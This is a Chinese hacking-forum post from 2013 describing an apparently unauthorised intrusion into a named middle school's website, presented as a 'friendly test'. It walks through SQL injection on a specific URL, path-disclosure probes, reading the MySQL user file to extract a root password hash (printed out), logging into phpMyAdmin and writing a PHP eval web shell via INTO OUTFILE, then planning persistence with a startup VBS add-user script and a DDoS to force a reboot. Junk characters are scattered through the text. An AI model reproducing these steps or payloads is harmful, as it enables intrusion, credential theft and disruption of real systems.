中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
: O% Y, z$ L, h. B发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
. O+ j( n9 r1 d2 d3 e& ~* K* r* t. t" B

9 K! M: @; d7 Z* s; X0 Z  R
* ^" ]( r  O1 q/ q% M常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ! U* C+ o. o- f7 `

" ^& [9 R- E+ r' E: d6 p* z那么想可以直接写入shell ,getshell有几个条件:0 _8 ]0 t& X' g
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
, T: a; x& G; {8 K. `& q5 r6 x; V* e, |8 `+ v  M
试着爆绝对路径:$ h9 D+ _' P6 {1 }5 t, C
1./phpMyAdmin/index.php?lang[]=1  
; i4 r; j+ m2 z; B2./phpMyAdmin/phpinfo.php  
% x9 I9 c! l" d! `+ _% S( ^3./load_file()  
& |6 \2 J4 j5 _  }& M4./phpmyadmin/themes/darkblue_orange/layout.inc.php  / V" B- y" a2 }, \
5./phpmyadmin/libraries/select_lang.lib.php    X% J0 [: T8 ]# `
6./phpmyadmin/libraries/lect_lang.lib.php  
: W" @9 n0 o/ c7./phpmyadmin/libraries/mcrypt.lib.php   ' I( c+ n3 n) V, O6 T
8./phpmyadmin/libraries/export/xls.php  
7 @$ I& A0 _" T* v4 H" t, h0 b6 |, e8 n3 x6 t
均不行...........................
# b) G+ a  X# o. u: }
& v: }) [+ {1 c+ k# @御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
0 P. ]6 T2 E3 B: Q3 e/ b2 b& l9 n+ _- d
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin . i" N5 b/ R$ D& g) }9 [) P

# K: d; D) l0 [2 Y4 O/ n9 |默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
2 w+ D+ F0 Z( y& m3 d/ E6 y/ s+ i
& L1 D, u5 d3 w- P0 V敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
( h5 \  I. Q# i3 C+ R$ @( N! |' ^0 B' Q5 P7 L* T
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 6 @. Z7 c. \+ P5 B; J( k

! z! q, z0 M/ Uhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini , U" B7 s6 U6 _5 E( y4 [4 A
8 u( f8 g0 w- L
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
3 d2 }! r* ]  {8 Y" J8 d5 Q
( X& ?7 D9 ?& r4 W  O' I! r成功读到root密码:0 n) y8 c+ M! {$ r. Q: u
2 f2 I4 q8 K9 ~9 R/ e
17---- r(0072)5 N3 u+ N. l6 L5 r! x; h: S
18---- o(006f)- R! w) t2 M8 N2 z2 m
19---- o(006f)
% {# G& h6 e0 D  ^% E20---- t(0074)$ g1 t! R; i- j: O1 A% D
21---- *(002a)
0 T4 q  C- n+ U3 R, F- {- i7 u+ ^22---- 8(0038)# H- m/ [/ V3 i6 T- O/ g
23---- 2(0032)
* D- n+ J% j' g9 Q: y9 g24---- E(0045)
& k: _  l4 o' T; l25---- 1(0031). T. m; ?$ q% Z& i0 y* F* ?/ C
26---- C(0043)! k4 }5 {" D) ^3 T/ Y+ D
27---- 5(0035)
. X0 v5 ^2 u8 P0 g; E28---- 8(0038); C, \+ I/ g6 J9 y0 q* i# m
29---- 2(0032)
' ~9 r' l% r0 `/ w( ~" }5 m30---- 8(0038)( ~  Q# F" y7 m2 u- {
31---- A(0041)
$ Y% M8 @9 J4 ?5 c8 k* t( d32---- 9(0039): ?( ~; B6 [5 l
33---- B(0042): l/ ~. z/ ~# t- e
34---- 5(0035)
% g: C* e0 g  [+ V35---- 4(0034)
& N9 F! i/ M* r: R' c36---- 8(0038)
2 ]0 ^! v7 z. p7 t; }7 C37---- 6(0036)' W& o8 w# C& |
38---- 4(0034)
8 W# T" m2 z9 o. L2 t% k  r39---- 9(0039)) ^0 }' v  m! _. Z) W# ^+ J
40---- 1(0031)
( j7 Q: |3 o1 p; i+ d$ I41---- 1(0031)
" {" |8 f/ Y& t  m+ I42---- 5(0035)( n5 M& P' d+ }
43---- 3(0033)
- e1 j, C0 v0 O; m% s/ f% L: Y2 S44---- 5(0035); Q3 w' q3 U$ y" O6 ?. I
45---- 9(0039)8 j" ]& Y0 f5 p
46---- 8(0038)
! X3 Y  E# f) a! x0 Z3 C9 F47---- F(0046)
3 p  v/ A+ j6 ]: Q1 F48---- F(0046)5 _* }- Y& x, @
49---- 4(0034)
2 S+ b2 o, A; {6 [4 G50---- F(0046)
# S8 H# ]1 i5 Y8 I+ |51---- 0(0030)
- I/ Y  w( |- x. N52---- 3(0033)4 F# `4 c% y  A8 N
53---- 2(0032): ^6 L1 }0 M# }5 O% t* K5 d3 i
54---- A(0041)2 m1 e4 N0 r, V5 C/ t
55---- 4(0034)# N' m6 Q1 z& D1 k5 h: ^9 \
56---- A(0041)  C+ ^) h. j8 P4 `
57---- B(0042)% {6 a2 g0 j* J" R
58---- *(0044)- I2 r2 Y' S6 ^. s
59---- *(0035)8 V+ e( |9 U: E& V8 ]  p
60---- *(0041)
" {' h; g' o$ O: E* y) P61---- *0032)/ \2 |" R; f6 t$ n

  Z; t. }0 N2 f7 w9 s5 T+ [4 B解密后成功登陆phpmyamin
: g* d, D% X" V6 C8 F5 x* x" o                          " C& B6 f3 b1 K/ U# w% ]
5 e& F* U' b9 {5 m& @
                             [attach]164[/attach]
5 Y" T* h: ]6 Y5 Q5 q! ~/ z+ q+ ?# T4 N" c; P- j
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'  E/ O# D8 B  K7 O6 _+ f

( V- ~# b& e/ ~+ ^1 ^成功执行,拿下shell,菜刀连接:  f7 V- b8 d+ F# N+ `. p* T

+ o& E* W5 I) i0 @3 x; \服务器不支持asp,aspx,php提权无果...................' u1 A7 U( l( ?5 z' V: x

6 k) G% A4 k0 o3 F0 |% S) t但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
& ?* Y1 r7 ]. l
服务器上已经有个隐藏帐号了

4 w+ `3 A% I& G( _5 E& P
别名     administrators
' w+ m! V0 [! t$ K" }$ L注释     管理员对计算机/域有不受限制的完全访问权

0 H2 _) J+ v3 o( d
成员
5 i1 U3 K9 ]  @3 B
-------------------------------------------------------------------------------  O/ ?- Z! f% i
admin
5 p& Z+ I8 f. C$ _, b$ aAdministrator# F' A* m  b9 K' ]" r
slipper$
  [4 J/ {% ^0 Q5 isqluser8 L  K& m0 {" ?
命令成功完成。
! L- Z. M. b: R" V0 U, l% }
$ f- P; ~4 @. m' Z6 A( y服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
% P, `( o4 Z/ v" R: i) c3 c  g7 g
ddos服务器重启,不然就只能坐等服务器重启了...............................  A* s- s6 J# ?' [- K

, j2 H6 x: M; z      
2 q. o0 X% t- S

作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2